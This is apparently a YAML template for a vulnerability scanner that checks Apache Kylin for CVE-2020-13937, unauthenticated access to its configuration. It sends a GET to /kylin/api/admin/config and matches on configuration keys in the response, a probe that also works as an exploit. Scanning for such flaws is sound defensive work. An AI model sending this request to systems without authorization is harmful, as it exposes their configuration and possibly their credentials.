product: Apache-Kylin
vName: Apache-Kylin config未授权访问
type: 访问控制
vID:
  - CVE-2020-13937
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://s.tencent.com/research/bsafe/1156.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /kylin/api/admin/config
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - config
              - kylin.metadata.url
            logic: and